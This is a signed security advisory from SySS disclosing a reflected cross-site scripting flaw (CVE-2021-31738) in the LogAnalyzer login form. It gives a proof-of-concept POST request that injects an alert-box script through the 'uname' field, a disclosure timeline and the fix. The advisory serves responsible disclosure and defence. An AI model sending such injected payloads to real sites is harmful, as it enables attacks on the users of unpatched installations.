-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Advisory ID:               SYSS-2021-024
Product:                   LogAnalyzer
Manufacturer:              Adiscon
Affected Version(s):       4.1.10, 4.1.11
Tested Version(s):         4.1.10, 4.1.11
Vulnerability Type:        Cross-Site Scripting (CWE-79)
Risk Level:                Medium
CVSS Score:                CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:L/A:N
Solution Status:           Fixed
Manufacturer Notification: 2021-04-21
Solution Date:             2021-04-29
Public Disclosure:         2021-05-07
CVE Reference:             CVE-2021-31738
Author of Advisory:        Michael Strametz, SySS Cyber Security GmbH

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

Adiscon LogAnalyzer is a web interface to syslog and other network event 
data. It provides easy browsing, analysis of realtime network events and
reporting services.[1]

Due to insufficient user input validation and escaping, LogAnalyzer is 
vulnerable to reflected cross-site scripting (XSS).

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

It is possible to place JavaScript code within the fields username 
("uname") and password ("pass") of the login form.

JavaScript code will be reflected from the server and executed in 
the victim's browser.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

Place JavaScript code within the field "uname" and send as HTTP POST 
request:

POST /login.php HTTP/1.1
Host: loganalyzer-demo.adiscon.com
[...]
Content-Length: 144
Cookie: PHPSESSID=7l8nvd0341l7gkav73j45pohhs

uname=syss%22%3E%3Cscript%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29
%3C%2Fscript%3E%3C%5C%21--&pass=topsecret&op=login&referer=index.php

If the JavaScript code is executed, an alert box will be opened showing 
the message "XSS".

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

The reported security issues have been fixed in newer LogAnalyzer software
versions. Update LogAnalyzer to the latest version [2].

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2021-03-24: Vulnerability discovered
2021-04-21: Vulnerability reported to manufacturer
2021-04-21: Manufacturer acknowledged receipt of security advisory
2021-04-21: Manufacturer asks for more information
2021-04-22: SySS answers open questions
2021-04-23: Manufacturer responds and will look into the reported
            security issue
2021-04-29: Release of new software version (4.1.12) fixing the reported
	    security issue
2021-05-07: Public release of security advisory

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Product website for Adiscon LogAnalyzer
    https://loganalyzer.adiscon.com/
[2] Download page for LogAnalyzer
	https://loganalyzer.adiscon.com/downloads/
[3] Download page for LogAnalyzer 4.1.11
    https://loganalyzer.adiscon.com/downloads/loganalyzer-v4-1-11-v4-stable/
[4] SySS security advisory SYSS-2021-024
    https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2021-024.txt
[5] SySS responsible disclosure policy
    https://www.syss.de/responsible-disclosure-policy/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Michael Strametz of SySS Cyber 
Security GmbH (Austria).

E-Mail: michael.strametz@syss.de
Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Michael_Strametz.asc
Key Fingerprint: AD50 E8B8 4E6E 5E00 F45F CE35 744F A11A 2EAC 214D

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS website.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: http://creativecommons.org/licenses/by/3.0/deed.en
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEErVDouE5uXgD0X841dE+hGi6sIU0FAmCT+EgACgkQdE+hGi6s
IU2njg//TFOVswoxm1CX30AcBSuMcBi5jSnpm45pajTvdQQ66ULk/+NjsGN2eYJu
EHo+MehMc6L0i8+VkLIRaVCsH8of/e5Rnt1elYgEDk842nnd4r2cd1D7hXT7+aeL
ZYjCD4OTO0Xbgp0GUGEVbxpq8r3C6BCSv1jEjBNl9oDduX3Ro7hNcJozcrWjlQ4C
tHmud6Yv5xm2pi8kMY9ZPcGIMGYiXqcU+Mmfb5/CrqMSTrbMQ/CcNKcBMCj4BCJb
hGufSOQAxfjt1SQyPFkBbRYi0q4i7DNDzQrzjwpHK46oewkmpv5CjTD8e3X/Lc/T
5ysdaAUhsawSbf+Nur0kU8Ln02uiGFrFFdwr48aQri31JkjaRRpe957sQVCNRsbX
RiDyjSDKE0V2DUXyIOq5XCt9+ktPKvQtI2td+tIfHkZKYhvO1FbMXap+PJMLeoau
fdhUqOyHygbGq4VJAgZc5C9NSapPgK4B69sEKfOIRZQ7WiIGEW/upVEhLjy8dGId
i2t2F3Yj/ECZeS8fDfTtWN3c9YDs+u3gW4sMx1nr8itJ5DSPdC0+sfxb6grXoZuj
KLMGOP0LMB386iGKgEQ7aAbAG3uDUdOKpWmOPpOo76bvVnxrWdTp42tEMsiUmwAK
uSIm5lajCzhxFWbiewllxnmAG4wsh2sC7IaRANkmKocBOMHnImo=
=q3sH
-----END PGP SIGNATURE-----